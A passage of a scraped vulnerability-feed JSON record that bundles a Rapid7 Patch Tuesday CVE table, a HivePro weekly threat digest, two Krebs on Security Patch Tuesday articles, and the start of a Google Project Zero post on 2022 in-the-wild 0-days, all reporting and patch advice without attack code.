Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21895>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21864>) | Windows UI Immersive Server API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21866>) | Windows System Launcher Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21875>) | Windows Storage Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21863>) | Windows StateRepository API Server file Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21874>) | Windows Security Center API Remote Code Execution Vulnerability | No | Yes | 7.8 | No \n[CVE-2022-21892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21892>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21958>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21959>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21960>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21961>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21962>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21963>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.4 | Yes \n[CVE-2022-21928](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21928>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.3 | Yes \n[CVE-2022-21867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21867>) | Windows Push Notifications Apps Elevation Of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21888>) | Windows Modern Execution Server Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21881>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21879>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 5.5 | No \n[CVE-2022-21849](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21849>) | Windows IKE Extension Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21901>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 9 | Yes \n[CVE-2022-21847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21847>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21878>) | Windows Geolocation Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21839>) | Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability | No | Yes | 6.1 | No \n[CVE-2022-21868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21868>) | Windows Devices Human Interface Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21921>) | Windows Defender Credential Guard Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21906>) | Windows Defender Application Control Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21852>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21902>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21896>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21858>) | Windows Bind Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21860>) | Windows AppContracts API Server Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21876>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21882>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21887>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21873>) | Tile Data Repository Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21861>) | Task Flow Data Engine Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21870>) | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21877>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21894>) | Secure Boot Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21964>) | Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-22947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-22947>) | Open Source Curl Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21871>) | Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21910>) | Microsoft Cluster Port Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36976>) | Libarchive Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21907>) | HTTP Protocol Stack Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21918>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21865>) | Connected Devices Platform Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21869>) | Clipboard User Service Elevation of Privilege Vulnerability | No | No | 7 | No", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T21:41:56", "type": "rapid7blog", "title": "Patch Tuesday - January 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21907", "CVE-2021-22947", "CVE-2021-31166", "CVE-2021-36976", "CVE-2022-0096", "CVE-2022-0097", "CVE-2022-0098", "CVE-2022-0099", "CVE-2022-0100", "CVE-2022-0101", "CVE-2022-0102", "CVE-2022-0103", "CVE-2022-0104", "CVE-2022-0105", "CVE-2022-0106", "CVE-2022-0107", "CVE-2022-0108", "CVE-2022-0109", "CVE-2022-0110", "CVE-2022-0111", "CVE-2022-0112", "CVE-2022-0113", "CVE-2022-0114", "CVE-2022-0115", "CVE-2022-0116", "CVE-2022-0117", "CVE-2022-0118", "CVE-2022-0120", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21837", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21841", "CVE-2022-21842", "CVE-2022-21843", "CVE-2022-21846", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21891", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21929", "CVE-2022-21930", "CVE-2022-21931", "CVE-2022-21932", "CVE-2022-21954", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964", "CVE-2022-21969", "CVE-2022-21970"], "modified": "2022-01-11T21:41:56", "id": "RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "href": "https://blog.rapid7.com/2022/01/11/patch-tuesday-january-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-08-17T04:36:00", "description": "Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&amp;CK TTPs 563 14 3 69 08 71 For a detailed threat digest, download the pdf file here Summary The second week of August 2022 witnessed the discovery of 563 vulnerabilities out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, 2 zero-day, and 10 vulnerabilities are awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. This week also saw Cuba Ransomware exploiting CVE-2020-1472 and CVE-2021-1732 and another vulnerability CVE-2020-0796 was seen exploited by BlueSky Ransomware. Further, we also observed 3 Threat Actor groups being highly active in the last week. UNC2447, an unknown threat actor group popular for financial crime and gain, Lapsus$, a Brazilian threat actor group popular for Data theft and Destruction, and Yanluowang ransomware gang, a Chinese threat actor group popular for financial crime and gain were observed stealing around 2.8 GB of data from Cisco. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-16T05:00:49", "type": "hivepro", "title": "Vulnerabilities & Threats that Matter 08 \u2013 14th Aug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1472", "CVE-2021-1732"], "modified": "2022-08-16T05:00:49", "id": "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "href": "https://www.hivepro.com/vulnerabilities-threats-that-matter-08-14th-aug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2022-02-09T21:27:09", "description": "\n\n**Microsoft** today released software updates to plug security holes in its **Windows** operating systems and related software. This month&#x27;s relatively light patch batch is refreshingly bereft of any zero-day threats, or even scary critical vulnerabilities. But it does fix four dozen flaws, including several that Microsoft says will likely soon be exploited by malware or malcontents.\n\nWhile none of the patches address bugs that earned Microsoft&#x27;s most dire &quot;critical&quot; rating, there are multiple &quot;remote code execution&quot; vulnerabilities that Redmond believes are ripe for exploitation. Among those is [CVE-2022-22005](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22005>), a weakness in Microsoft&#x27;s **Sharepoint Server** versions 2013-2019 that could be exploited by any authenticated user.\n\n&quot;The vulnerability does require an attacker to be authenticated in order to exploit it, which is likely why Microsoft only labeled it &#x27;Important,'&quot; said **Allan Liska**, senior security architect at **Recorded Future**. &quot;However, given the number of stolen credentials readily available on underground markets, getting authenticated could be trivial. Organizations that have public-facing SharePoint Servers should prioritize implementing this patch.&quot;\n\n**Kevin Breen** at Immersive Labs called attention to [CVE-2022-21996](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21996>), an elevation of privilege vulnerability in the core Windows component &quot;**Win32k**.&quot;\n\n&quot;In January we saw CVE-2022-21882, a vulnerability in Win32k that was being actively exploited in the wild, which prompted CISA to issue a directive to all federal agencies to mandate that patches be applied,&quot; Breen said. &quot;February sees more patches for the same style of vulnerability in this same component. It\u2019s not clear from the release notes whether this is a brand new vulnerability or if it is related to the previous month\u2019s update. Either way, we have seen attackers leverage this vulnerability so it\u2019s safer to err on the side of caution and update this one quickly.&quot;\n\nAnother elevation of privilege flaw [CVE-2022-21989](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21989>) -- in the Windows Kernel -- was the only vulnerability fixed this month that was publicly disclosed prior to today.\n\n&quot;Despite the lack of critical fixes, it&#x27;s worth remembering that attackers love to use elevation of privilege vulnerabilities, of which there are 18 this month,&quot; said **Greg Wiseman**, product manager at **Rapid7**. &quot;Remote code execution vulnerabilities are also important to patch, even if they may not be considered &#x27;wormable.&#x27; In terms of prioritization, defenders should first focus on patching server systems.&quot;\n\nFebruary&#x27;s Patch Tuesday is once again brought to you by **Print Spooler**, the Windows component responsible for handling printing jobs. Four of the bugs quashed in this release relate to our friend Mr. Print Spooler. In July 2021, Microsoft issued an emergency fix for a Print Spooler flaw dubbed &quot;[PrintNightmare](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>)&quot; that was actively being exploited to remotely compromise Windows PCs. Redmond has been steadily spooling out patches for this service ever since.\n\nOne important item to note this week is that Microsoft announced it will start blocking Internet macros by default in **Office**. This is a big deal because malicious macros hidden in Office documents have become a huge source of intrusions for organizations, and they are often the initial vector for ransomware attacks.\n\nAs **Andrew Cunningham** writes for _Ars Technica_, under the new regime when files that use macros are downloaded from the Internet, those macros will now be disabled entirely by default. The change will also be enabled for all currently supported standalone versions of Office, including versions 2021, 2019, 2016, and 2013.\n\n&quot;Current versions of the software offer an alert banner on these kinds of files that can be clicked through, but the new version of the banner offers no way to enable the macros,&quot; Cunningham [wrote](<https://arstechnica.com/gadgets/2022/02/microsoft-will-block-downloaded-macros-in-office-versions-going-back-to-2013/>). &quot;The change will be previewed starting in April before being rolled out to all users of the continuously updated Microsoft 365 version of Office starting in June.&quot;\n\nJanuary\u2019s patch release was a tad heavier and rockier than most, with Microsoft forced to re-issue several patches to address unexpected issues caused by the updates. Breen said while February&#x27;s comparatively light burden should give system administrators some breathing room, it shouldn&#x27;t be viewed as an excuse to skip updates.\n\n&quot;But it does reinforce how important it is to test patches in a staging environment or use a staggered rollout, and why monitoring for any adverse impacts should always be a key step in your patching policy,&quot; Breen said.\n\nFor a complete rundown of all patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+February+2022+Patch+Tuesday/28316/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/defcon-2-august-updates-include-print-spooler-fixes/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these patches, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T22:38:16", "type": "krebs", "title": "Microsoft Patch Tuesday, February 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2022-21989", "CVE-2022-21996", "CVE-2022-22005"], "modified": "2022-02-08T22:38:16", "id": "KREBS:7BA87FE317071FD5ACDB0EBEBA296F41", "href": "https://krebsonsecurity.com/2022/02/microsoft-patch-tuesday-february-2022-edition/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T00:29:38", "description": "**Microsoft** today rolled out updates to plug at least 56 security holes in its **Windows** operating systems and other software. One of the bugs is already being actively exploited, and six of them were publicized prior to today, potentially giving attackers a head start in figuring out how to exploit the flaws.\n\n\n\nNine of the 56 vulnerabilities earned Microsoft&#x27;s most urgent &quot;critical&quot; rating, meaning malware or miscreants could use them to seize remote control over unpatched systems with little or no help from users.\n\nThe flaw being exploited in the wild already -- [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) -- affects Windows 10, Server 2016 and later editions. It received a slightly less dire &quot;important&quot; rating and mainly because it is a vulnerability that lets an attacker increase their authority and control on a device, which means the attacker needs to already have access to the target system.\n\nTwo of the other bugs that were disclosed prior to this week are critical and reside in **Microsoft&#x27;s .NET Framework**, a component required by many third-party applications (most Windows users will have some version of .NET installed).\n\nWindows 10 users should note that while the operating system installs all monthly patch roll-ups in one go, that rollup does not typically include .NET updates, which are installed on their own. So when you&#x27;ve backed up your system and installed this month&#x27;s patches, you may want to check Windows Update again to see if there are any .NET updates pending.\n\nA key concern for enterprises is another critical bug in the DNS server on Windows Server 2008 through 2019 versions that could be used to remotely install software of the attacker&#x27;s choice. [CVE-2021-24078](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24078>) earned [a CVSS Score](<https://nvd.nist.gov/vuln-metrics/cvss>) of 9.8, which is about as dangerous as they come.\n\n**Recorded Future** says this vulnerability can be exploited remotely by getting a vulnerable DNS server to query for a domain it has not seen before (e.g. by sending a phishing email with a link to a new domain or even with images embedded that call out to a new domain). **Kevin Breen** of **Immersive Labs** notes that CVE-2021-24078 could let an attacker steal loads of data by altering the destination for an organization&#x27;s web traffic -- such as pointing internal appliances or Outlook email access at a malicious server.\n\nWindows Server users also should be aware that Microsoft this month is enforcing the second round of security improvements as part of a two-phase update to address [CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>), a severe vulnerability that [first saw active exploitation back in September 2020](<https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/>).\n\nThe vulnerability, dubbed &quot;**Zerologon**,&quot; is a bug in the core &quot;**Netlogon**&quot; component of Windows Server devices. The flaw lets an unauthenticated attacker gain administrative access to a Windows domain controller and run any application at will. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\nMicrosoft&#x27;s [initial patch for CVE-2020-1472](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>) fixed the flaw on Windows Server systems, but did nothing to stop unsupported or third-party devices from talking to domain controllers using the insecure Netlogon communications method. Microsoft said it chose this two-step approach &quot;to ensure vendors of non-compliant implementations can provide customers with updates.&quot; With this month&#x27;s patches, Microsoft will begin rejecting insecure Netlogon attempts from non-Windows devices.\n\nA couple of other, non-Windows security updates are worth mentioning. Adobe today [released updates to fix at least 50 security holes in a range of products](<https://blogs.adobe.com/psirt/?p=1965>), including Photoshop and Reader. The Acrobat/Reader update tackles a critical zero-day flaw that [Adobe says](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) is actively being exploited in the wild against Windows users, so if you have Adobe Acrobat or Reader installed, please make sure these programs are kept up to date.\n\nThere is also a zero-day flaw in **Google&#x27;s Chrome Web browser** (CVE-2021-21148) that is seeing active attacks. Chrome downloads security updates automatically, but users still need to restart the browser for the updates to fully take effect. If you&#x27;re a Chrome user and notice a red &quot;update&quot; prompt to the right of the address bar, it&#x27;s time to save your work and restart the browser.\n\nStandard reminder: While staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re less likely to pull your hair out when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nKeep in mind that Windows 10 by default will automatically download and install updates on its own schedule. If you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-09T22:37:19", "type": "krebs", "title": "Microsoft Patch Tuesday, February 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1732", "CVE-2021-21148", "CVE-2021-24078"], "modified": "2021-02-09T22:37:19", "id": "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "href": "https://krebsonsecurity.com/2021/02/microsoft-patch-tuesday-february-2021-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2022-06-30T13:56:58", "description": "Posted by Maddie Stone, Google Project Zero\n\nThis blog post is an overview of a talk, \u201c 0-day In-the-Wild Exploitation in 2022\u2026so far\u201d, that I gave at the FIRST conference in June 2022. The slides are available [here](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nFor the last three years, we\u2019ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the [2021 Year in Review report](<https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html>), which we published just a few months ago in April. While we plan to stick with that annual cadence, we\u2019re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022. \n\nAs of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we\u2019ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug. \n\nProduct\n\n| \n\n2022 ITW 0-day\n\n| \n\nVariant \n \n---|---|--- \n \nWindows win32k\n\n| 